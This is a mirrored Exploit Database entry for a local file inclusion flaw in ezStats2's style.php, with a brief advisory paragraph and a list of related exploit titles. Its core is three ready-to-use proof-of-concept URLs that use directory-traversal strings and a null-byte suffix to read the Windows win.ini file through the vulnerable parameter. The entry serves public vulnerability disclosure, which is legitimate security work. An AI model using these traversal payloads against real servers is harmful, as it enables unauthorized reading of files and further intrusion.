ezStats2 – ‘style.php’ Local File Inclusion

Exploit Database
11 阅读

作者： L0n3ly-H34rT

日期： 2013-02-06
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/38294/

source: https://www.securityfocus.com/bid/57757/info

ezStats2 is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. 

An attacker can exploit this vulnerability using directory-traversal strings to view files and execute local scripts in the context of the web server process. This may aid in further attacks.

http://www.example.com/ezStats2_mohw/stylesheets/style.php?files=../../../../../../../../../../windows/win.ini%00.jpg 

http://www.example.com/ezServer/stylesheets/style.php?files=../../../../../../../../../../windows/win.ini%00.jpg 

http://www.example.com/ezStats2_psn/stylesheets/style.php?files=../../../../../../../../../../windows/win.ini%00.jpg

last Exploits
ezStats2 – ‘style.php’ Local File Inclusion的更多信息

Mambo Component N-Gallery – SQL Injection：
Free Simple CMS 1.0 – Multiple Vulnerabilities：
WordPress Plugin Tribulant Newsletters 4.6.4.2 – File Disclosure / Cross-Site Scripting：
phpCollab 2.5 – Direct Request Multiple Protected Page Access：
Lot Reservation Management System – Unauthenticated File Disclosure：
OpenText Documentum Content Server – Arbitrary File Download Privilege Escalation：
Craft CMS 2.7.9/3.2.5 – Information Disclosure：
Qlikview 11.20 SR11 – Blind XML External Entity Injection：